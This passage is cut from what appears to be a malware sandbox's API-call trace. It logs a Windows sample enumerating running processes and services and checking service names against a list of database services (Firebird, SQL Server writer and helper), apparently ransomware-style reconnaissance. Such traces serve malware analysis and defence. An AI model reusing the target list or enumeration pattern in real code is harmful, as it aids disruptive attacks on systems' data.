dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0197.576] lstrlenW (lpString="trustees.exe") returned 12 [0197.576] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0197.577] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0197.577] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0197.578] lstrlenW (lpString="isbn.exe") returned 8 [0197.578] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0197.579] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0197.579] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0197.580] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0197.580] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0197.581] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0197.581] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0197.582] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0197.582] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0197.583] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0197.583] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0197.584] lstrlenW (lpString="playstation iraq.exe") returned 20 [0197.584] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0197.585] lstrlenW (lpString="harbor.exe") returned 10 [0197.585] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0197.586] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0197.586] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0197.587] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0197.587] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0197.588] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0197.588] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0197.589] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0197.589] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0197.590] lstrlenW (lpString="larent.exe") returned 10 [0197.590] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0197.591] lstrlenW (lpString="stereo.exe") returned 10 [0197.591] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0197.592] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0197.592] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0197.593] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0197.593] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0197.594] lstrlenW (lpString="state.exe") returned 9 [0197.595] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0197.596] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0197.596] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.597] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0197.597] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0197.598] lstrlenW (lpString="taskhostw.exe") returned 13 [0197.598] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0197.599] lstrlenW (lpString="sppsvc.exe") returned 10 [0197.599] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.600] lstrlenW (lpString="svchost.exe") returned 11 [0197.600] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0197.601] lstrlenW (lpString="Pg.exe") returned 6 [0197.601] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0197.602] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0197.602] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0197.603] lstrlenW (lpString="conhost.exe") returned 11 [0197.603] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0197.604] lstrlenW (lpString="cmd.exe") returned 7 [0197.604] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0197.605] lstrlenW (lpString="conhost.exe") returned 11 [0197.605] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0198.167] CloseHandle (hObject=0x410) returned 1 [0198.167] Sleep (dwMilliseconds=0x1f4) [0199.061] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236baf8 [0199.061] EnumServicesStatusExW (in: hSCManager=0x236baf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0199.062] GetLastError () returned 0xea [0199.062] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x2371d68 [0199.062] EnumServicesStatusExW (in: hSCManager=0x236baf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2371d68, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2371d68, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0199.063] CloseServiceHandle (hSCObject=0x236baf8) returned 1 [0199.064] lstrlenW (lpString="Appinfo") returned 7 [0199.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0199.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0199.064] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0199.064] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0199.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0199.064] lstrlenW (lpString="AppXSvc") returned 7 [0199.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0199.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0199.064] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0199.064] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0199.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0199.064] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0199.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0199.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0199.064] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0199.064] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0199.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0199.064] lstrlenW (lpString="Audiosrv") returned 8 [0199.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0199.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0199.064] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0199.064] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0199.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0199.065] lstrlenW (lpString="BFE") returned 3 [0199.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0199.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0199.065] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0199.065] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0199.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0199.065] lstrlenW (lpString="BITS") returned 4 [0199.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0199.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0199.065] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0199.065] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0199.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0199.065] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0199.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0199.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0199.065] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0199.065] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0199.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0199.065] lstrlenW (lpString="CDPSvc") returned 6 [0199.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0199.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0199.065] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0199.065] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0199.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0199.065] lstrlenW (lpString="ClickToRunSvc") returned 13 [0199.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0199.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0199.066] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0199.066] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0199.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0199.066] lstrlenW (lpString="ClipSVC") returned 7 [0199.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0199.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0199.066] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0199.066] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0199.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0199.066] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0199.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0199.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0199.066] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0199.066] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0199.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0199.066] lstrlenW (lpString="CryptSvc") returned 8 [0199.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0199.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0199.066] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0199.066] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0199.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0199.066] lstrlenW (lpString="DcomLaunch") returned 10 [0199.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0199.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0199.066] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0199.066] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0199.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0199.066] lstrlenW (lpString="DeviceAssociationService") returned 24 [0199.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0199.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0199.067] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0199.067] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0199.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0199.067] lstrlenW (lpString="Dhcp") returned 4 [0199.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0199.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0199.067] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0199.067] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0199.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0199.067] lstrlenW (lpString="Dnscache") returned 8 [0199.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0199.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0199.067] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0199.067] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0199.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0199.067] lstrlenW (lpString="DoSvc") returned 5 [0199.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0199.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0199.067] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0199.067] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0199.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0199.067] lstrlenW (lpString="DPS") returned 3 [0199.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0199.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0199.067] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0199.067] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0199.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0199.068] lstrlenW (lpString="DusmSvc") returned 7 [0199.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0199.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0199.068] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0199.068] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0199.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0199.068] lstrlenW (lpString="EventLog") returned 8 [0199.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0199.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0199.068] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0199.068] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0199.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0199.068] lstrlenW (lpString="EventSystem") returned 11 [0199.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0199.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0199.068] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0199.068] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0199.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0199.068] lstrlenW (lpString="FontCache") returned 9 [0199.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0199.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0199.068] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0199.068] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0199.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0199.068] lstrlenW (lpString="gpsvc") returned 5 [0199.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0199.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0199.069] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0199.069] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0199.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0199.069] lstrlenW (lpString="iphlpsvc") returned 8 [0199.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0199.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0199.069] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0199.069] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0199.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0199.069] lstrlenW (lpString="KeyIso") returned 6 [0199.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0199.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0199.069] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0199.069] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0199.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0199.069] lstrlenW (lpString="LanmanServer") returned 12 [0199.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0199.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0199.069] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0199.069] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0199.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0199.069] lstrlenW (lpString="LanmanWorkstation") returned 17 [0199.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0199.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0199.069] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0199.069] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0199.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0199.070] lstrlenW (lpString="lfsvc") returned 5 [0199.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0199.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0199.070] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0199.070] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0199.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0199.070] lstrlenW (lpString="LicenseManager") returned 14 [0199.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0199.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0199.070] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0199.070] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0199.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0199.070] lstrlenW (lpString="lmhosts") returned 7 [0199.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0199.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0199.070] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0199.070] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0199.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0199.070] lstrlenW (lpString="LSM") returned 